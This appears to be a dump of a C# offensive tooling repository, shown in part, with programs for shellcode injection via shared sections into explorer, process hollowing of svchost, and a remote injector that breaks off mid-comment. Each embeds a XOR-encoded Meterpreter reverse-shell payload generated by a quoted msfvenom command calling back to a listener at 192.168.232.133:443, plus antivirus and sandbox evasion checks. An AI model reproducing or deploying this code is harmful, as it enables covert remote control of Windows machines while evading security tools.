0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f, 100 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6, 101 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb, 102 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05, 103 | 0x2f 104 | }; 105 | 106 | int len = buf.Length; 107 | uint uLen = (uint)len; 108 | 109 | // Get a handle on the local process 110 | IntPtr lHandle = Process.GetCurrentProcess().Handle; 111 | Console.WriteLine($"Got handle {lHandle} on local process."); 112 | 113 | // Grab the right PID 114 | string targetedProc = "explorer"; //change :) 115 | int procId = Process.GetProcessesByName(targetedProc).First().Id; 116 | 117 | // Get a handle on the remote process 118 | IntPtr pHandle = OpenProcess(ProcessAllFlags, false, procId); 119 | Console.WriteLine($"Got handle {pHandle} on PID {procId} ({targetedProc})."); 120 | 121 | // Create a RWX memory section with the size of the payload using 'NtCreateSection' 122 | IntPtr sHandle = new IntPtr(); 123 | long cStatus = NtCreateSection(ref sHandle, GenericAll, IntPtr.Zero, ref uLen, PageReadWriteExecute, SecCommit, IntPtr.Zero); 124 | Console.WriteLine($"Created new shared memory section with handle {sHandle}. Success: {cStatus == 0}."); 125 | 126 | // Map a view of the created section (sHandle) for the LOCAL process using 'NtMapViewOfSection' 127 | IntPtr baseAddrL = new IntPtr(); 128 | uint viewSizeL = uLen; 129 | ulong sectionOffsetL = new ulong(); 130 | long mStatusL = NtMapViewOfSection(sHandle, lHandle, ref baseAddrL, IntPtr.Zero, IntPtr.Zero, out sectionOffsetL, out viewSizeL, 2, 0, PageReadWrite); 131 | Console.WriteLine($"Mapped local memory section with base address {baseAddrL} (viewsize: {viewSizeL}, offset: {sectionOffsetL}). Success: {mStatusL == 0}."); 132 | 133 | // Map a view of the same section for the specified REMOTE process (pHandle) using 'NtMapViewOfSection' 134 | IntPtr baseAddrR = new IntPtr(); 135 | uint viewSizeR = uLen; 136 | ulong sectionOffsetR = new ulong(); 137 | long mStatusR = NtMapViewOfSection(sHandle, pHandle, ref baseAddrR, IntPtr.Zero, IntPtr.Zero, out sectionOffsetR, out viewSizeR, 2, 0, PageReadExecute); 138 | Console.WriteLine($"Mapped remote memory section with base address {baseAddrR} (viewsize: {viewSizeR}, offset: {sectionOffsetR}). Success: {mStatusR == 0}."); 139 | 140 | // Decode shellcode 141 | for (int i = 0; i < buf.Length; i++) 142 | { 143 | buf[i] = (byte)((uint)buf[i] ^ 0xfa); 144 | } 145 | 146 | // Copy shellcode to locally mapped view, which will be reflected in the remote mapping 147 | Marshal.Copy(buf, 0, baseAddrL, len); 148 | Console.WriteLine($"Copied shellcode to locally mapped memory at address {baseAddrL}."); 149 | 150 | // DEBUG: Read memory at remote address and verify it's the same as the intended shellcode 151 | byte[] remoteMemory = new byte[len]; 152 | IntPtr noBytesRead = new IntPtr(); 153 | bool result = ReadProcessMemory(pHandle, baseAddrR, remoteMemory, remoteMemory.Length, out noBytesRead); 154 | bool sameSame = ByteArrayCompare(buf, remoteMemory); 155 | Console.WriteLine($"DEBUG: Checking if shellcode is correctly placed remotely..."); 156 | if (sameSame != true) 157 | { 158 | Console.WriteLine("DEBUG: NOT THE SAME! ABORTING EXECUTION."); 159 | return; 160 | } 161 | else 162 | { 163 | Console.WriteLine("DEBUG: OK."); 164 | } 165 | // END DEBUG 166 | 167 | // Execute the remotely mapped memory using 'CreateRemoteThread' (EWWW high-level APIs!!!) 168 | if (CreateRemoteThread(pHandle, IntPtr.Zero, 0, baseAddrR, IntPtr.Zero, 0, IntPtr.Zero) != IntPtr.Zero) 169 | { 170 | Console.WriteLine("Injection done! Check your listener!"); 171 | } 172 | else 173 | { 174 | Console.WriteLine("Injection failed!"); 175 | } 176 | 177 | // Unmap the locally mapped section view using 'NtUnMapViewOfSection' 178 | uint uStatusL = NtUnmapViewOfSection(lHandle, baseAddrL); 179 | Console.WriteLine($"Unmapped local memory section. Success: {uStatusL == 0}."); 180 | 181 | // Close the section 182 | int clStatus = NtClose(sHandle); 183 | Console.WriteLine($"Closed memory section. Success: {clStatus == 0}."); 184 | } 185 | } 186 | } -------------------------------------------------------------------------------- /Sections Shellcode Process Injector/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Sections Shellcode Process Injector")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Sections Shellcode Process Injector")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("08dbc2bf-e9f3-4ae4-b0cc-6e9c8767982d")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Sections Shellcode Process Injector/Sections Shellcode Process Injector.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D} 8 | Exe 9 | Sections_Shellcode_Process_Injector 10 | Sections Shellcode Process Injector 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Sections Shellcode Process Injector/Sections Shellcode Process Injector.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sections Shellcode Process Injector", "Sections Shellcode Process Injector.csproj", "{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|x64.ActiveCfg = Debug|x64 19 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|x64.Build.0 = Debug|x64 20 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|x64.ActiveCfg = Release|x64 23 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {48768DED-4F3D-43B9-8D5A-3771A7C4278E} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Shellcode Process Hollowing/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Shellcode Process Hollowing/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace ProcessHollowing 5 | { 6 | public class Program 7 | { 8 | public const uint CREATE_SUSPENDED = 0x4; 9 | public const int PROCESSBASICINFORMATION = 0; 10 | 11 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 12 | public struct ProcessInfo 13 | { 14 | public IntPtr hProcess; 15 | public IntPtr hThread; 16 | public Int32 ProcessId; 17 | public Int32 ThreadId; 18 | } 19 | 20 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 21 | public struct StartupInfo 22 | { 23 | public uint cb; 24 | public string lpReserved; 25 | public string lpDesktop; 26 | public string lpTitle; 27 | public uint dwX; 28 | public uint dwY; 29 | public uint dwXSize; 30 | public uint dwYSize; 31 | public uint dwXCountChars; 32 | public uint dwYCountChars; 33 | public uint dwFillAttribute; 34 | public uint dwFlags; 35 | public short wShowWindow; 36 | public short cbReserved2; 37 | public IntPtr lpReserved2; 38 | public IntPtr hStdInput; 39 | public IntPtr hStdOutput; 40 | public IntPtr hStdError; 41 | } 42 | 43 | [StructLayout(LayoutKind.Sequential)] 44 | internal struct ProcessBasicInfo 45 | { 46 | public IntPtr Reserved1; 47 | public IntPtr PebAddress; 48 | public IntPtr Reserved2; 49 | public IntPtr Reserved3; 50 | public IntPtr UniquePid; 51 | public IntPtr MoreReserved; 52 | } 53 | 54 | [DllImport("kernel32.dll")] 55 | static extern void Sleep(uint dwMilliseconds); 56 | 57 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)] 58 | static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, 59 | IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, 60 | [In] ref StartupInfo lpStartupInfo, out ProcessInfo lpProcessInformation); 61 | 62 | [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)] 63 | private static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass, 64 | ref ProcessBasicInfo procInformation, uint ProcInfoLen, ref uint retlen); 65 | 66 | [DllImport("kernel32.dll", SetLastError = true)] 67 | static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, 68 | int dwSize, out IntPtr lpNumberOfbytesRW); 69 | 70 | [DllImport("kernel32.dll", SetLastError = true)] 71 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 72 | 73 | [DllImport("kernel32.dll", SetLastError = true)] 74 | static extern uint ResumeThread(IntPtr hThread); 75 | 76 | public static void Main(string[] args) 77 | { 78 | // AV evasion: Sleep for 10s and detect if time really passed 79 | DateTime t1 = DateTime.Now; 80 | Sleep(10000); 81 | double deltaT = DateTime.Now.Subtract(t1).TotalSeconds; 82 | if (deltaT < 9.5) 83 | { 84 | return; 85 | } 86 | 87 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp 88 | // XORed with key 0xfa 89 | byte[] buf = new byte[511] { 90 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8, 91 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2, 92 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0, 93 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb, 94 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2, 95 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71, 96 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2, 97 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2, 98 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33, 99 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf, 100 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71, 101 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2, 102 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2, 103 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13, 104 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa, 105 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f, 106 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e, 107 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92, 108 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0, 109 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 110 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f, 111 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40, 112 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f, 113 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33, 114 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f, 115 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb, 116 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb, 117 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb, 118 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 119 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba, 120 | 0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f, 121 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6, 122 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb, 123 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05, 124 | 0x2f 125 | }; 126 | 127 | // Start 'svchost.exe' in a suspended state 128 | StartupInfo sInfo = new StartupInfo(); 129 | ProcessInfo pInfo = new ProcessInfo(); 130 | bool cResult = CreateProcess(null, "c:\\windows\\system32\\svchost.exe", IntPtr.Zero, IntPtr.Zero, 131 | false, CREATE_SUSPENDED, IntPtr.Zero, null, ref sInfo, out pInfo); 132 | Console.WriteLine($"Started 'svchost.exe' in a suspended state with PID {pInfo.ProcessId}. Success: {cResult}."); 133 | 134 | // Get Process Environment Block (PEB) memory address of suspended process (offset 0x10 from base image) 135 | ProcessBasicInfo pbInfo = new ProcessBasicInfo(); 136 | uint retLen = new uint(); 137 | long qResult = ZwQueryInformationProcess(pInfo.hProcess, PROCESSBASICINFORMATION, ref pbInfo, (uint)(IntPtr.Size * 6), ref retLen); 138 | IntPtr baseImageAddr = (IntPtr)((Int64)pbInfo.PebAddress + 0x10); 139 | Console.WriteLine($"Got process information and located PEB address of process at {"0x" + baseImageAddr.ToString("x")}. Success: {qResult == 0}."); 140 | 141 | // Get entry point of the actual process executable 142 | // This one is a bit complicated, because this address differs for each process (due to Address Space Layout Randomization (ASLR)) 143 | // From the PEB (address we got in last call), we have to do the following: 144 | // 1. Read executable address from first 8 bytes (Int64, offset 0) of PEB and read data chunk for further processing 145 | // 2. Read the field 'e_lfanew', 4 bytes at offset 0x3C from executable address to get the offset for the PE header 146 | // 3. Take the memory at this PE header add an offset of 0x28 to get the Entrypoint Relative Virtual Address (RVA) offset 147 | // 4. Read the value at the RVA offset address to get the offset of the executable entrypoint from the executable address 148 | // 5. Get the absolute address of the entrypoint by adding this value to the base executable address. Success! 149 | 150 | // 1. Read executable address from first 8 bytes (Int64, offset 0) of PEB and read data chunk for further processing 151 | byte[] procAddr = new byte[0x8]; 152 | byte[] dataBuf = new byte[0x200]; 153 | IntPtr bytesRW = new IntPtr(); 154 | bool result = ReadProcessMemory(pInfo.hProcess, baseImageAddr, procAddr, procAddr.Length, out bytesRW); 155 | IntPtr executableAddress = (IntPtr)BitConverter.ToInt64(procAddr, 0); 156 | result = ReadProcessMemory(pInfo.hProcess, executableAddress, dataBuf, dataBuf.Length, out bytesRW); 157 | Console.WriteLine($"DEBUG: Executable base address: {"0x" + executableAddress.ToString("x")}."); 158 | 159 | // 2. Read the field 'e_lfanew', 4 bytes (UInt32) at offset 0x3C from executable address to get the offset for the PE header 160 | uint e_lfanew = BitConverter.ToUInt32(dataBuf, 0x3c); 161 | Console.WriteLine($"DEBUG: e_lfanew offset: {"0x" + e_lfanew.ToString("x")}."); 162 | 163 | // 3. Take the memory at this PE header add an offset of 0x28 to get the Entrypoint Relative Virtual Address (RVA) offset 164 | uint rvaOffset = e_lfanew + 0x28; 165 | Console.WriteLine($"DEBUG: RVA offset: {"0x" + rvaOffset.ToString("x")}."); 166 | 167 | // 4. Read the 4 bytes (UInt32) at the RVA offset to get the offset of the executable entrypoint from the executable address 168 | uint rva = BitConverter.ToUInt32(dataBuf, (int)rvaOffset); 169 | Console.WriteLine($"DEBUG: RVA value: {"0x" + rva.ToString("x")}."); 170 | 171 | // 5. Get the absolute address of the entrypoint by adding this value to the base executable address. Success! 172 | IntPtr entrypointAddr = (IntPtr)((Int64)executableAddress + rva); 173 | Console.WriteLine($"Got executable entrypoint address: {"0x" + entrypointAddr.ToString("x")}."); 174 | 175 | // Carrying on, decode the XOR payload 176 | for (int i = 0; i < buf.Length; i++) 177 | { 178 | buf[i] = (byte)((uint)buf[i] ^ 0xfa); 179 | } 180 | Console.WriteLine("XOR-decoded payload."); 181 | 182 | // Overwrite the memory at the identified address to 'hijack' the entrypoint of the executable 183 | result = WriteProcessMemory(pInfo.hProcess, entrypointAddr, buf, buf.Length, out bytesRW); 184 | Console.WriteLine($"Overwrote entrypoint with payload. Success: {result}."); 185 | 186 | // Resume the thread to trigger our payload 187 | uint rResult = ResumeThread(pInfo.hThread); 188 | Console.WriteLine($"Triggered payload. Success: {rResult == 1}. Check your listener!"); 189 | } 190 | } 191 | } -------------------------------------------------------------------------------- /Shellcode Process Hollowing/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Shellcode Process Hollowing")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Shellcode Process Hollowing")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d8b2f4f4-2b59-4457-b710-f15844570997")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Shellcode Process Hollowing/Shellcode Process Hollowing.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D8B2F4F4-2B59-4457-B710-F15844570997} 8 | Exe 9 | Shellcode_Process_Hollowing 10 | Shellcode Process Hollowing 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Shellcode Process Hollowing/Shellcode Process Hollowing.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode Process Hollowing", "Shellcode Process Hollowing.csproj", "{D8B2F4F4-2B59-4457-B710-F15844570997}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|x64.ActiveCfg = Debug|x64 19 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|x64.Build.0 = Debug|x64 20 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|x64.ActiveCfg = Release|x64 23 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {21316190-097C-4FD2-A87D-733E0DA746F9} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Shellcode Process Injector/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Shellcode Process Injector/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using System.Security.Principal; 5 | 6 | namespace RemoteShinject 7 | { 8 | public class Program 9 | { 10 | [Flags] 11 | public enum ProcessAccessFlags : uint 12 | { 13 | All = 0x001F0FFF 14 | } 15 | [Flags] 16 | public enum AllocationType 17 | { 18 | Commit = 0x1000, 19 | Reserve = 0x2000 20 | } 21 | 22 | [Flags] 23 | public enum MemoryProtection 24 | { 25 | ExecuteReadWrite = 0x40 26 | } 27 | 28 | [DllImport("kernel32.dll", SetLastError = true)] 29 | public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId); 30 | 31 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 32 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect); 33 | 34 | [DllImport("kernel32.dll", SetLastError = true)] 35 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 36 | 37 | [DllImport("kernel32.dll")] 38 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 39 | 40 | [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 41 | static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred); 42 | 43 | [System.Runtime.InteropServices.DllImport("kernel32.dll")] 44 | static extern IntPtr GetCurrentProcess(); 45 | 46 | static bool IsElevated 47 | { 48 | get 49 | { 50 | return WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid); 51 | } 52 | } 53 | 54 | public static void Main(string[] args) 55 | { 56 | // Sandbox evasion 57 | IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); 58 | if (mem == null) 59 | { 60 | return; 61 | } 62 | 63 | // Xor-encoded payload, key 0xfa 64 | // msfvenom -p 